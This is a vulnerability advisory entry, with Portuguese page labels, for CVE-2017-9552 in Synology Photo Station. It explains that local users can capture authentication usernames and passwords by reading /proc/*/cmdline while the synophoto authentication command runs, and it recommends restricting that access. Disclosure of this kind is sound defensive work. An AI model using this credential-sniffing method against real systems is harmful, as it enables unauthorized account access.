PT-2017-19012 · Synology · Synology Photo Station

Frederic Crozat

Publicado

2017-06-13

Atualizado

2019-10-09

CVE-2017-9552

CVSS v3.1

7.8

Alta

Vetor

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions Synology Photo Station versions 6.0-2528 through 6.7.1-3419

Description A design flaw in the authentication mechanism of Synology Photo Station allows local users to obtain credentials. The synophoto dsm user program is used for authentication, and local users can exploit this by sniffing the /proc/*/cmdline to obtain the USERNAME and PASSWORD used in the synophoto dsm user --auth USERNAME PASSWORD command.

Recommendations For Synology Photo Station versions 6.0-2528 through 6.7.1-3419, consider restricting access to the /proc/*/cmdline to minimize the risk of credential exposure until a patch is available.

Correção

Insufficiently Protected Credentials

Improper Authentication

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-522CWE-287

Identificadores relacionados

CVE-2017-9552

Produtos afetados

Synology Photo Station

PT-2017-19012 · Synology · Synology Photo Station

CVE-2017-9552

Enumeração de Fraquezas

Identificadores relacionados

Produtos afetados

Referências · 4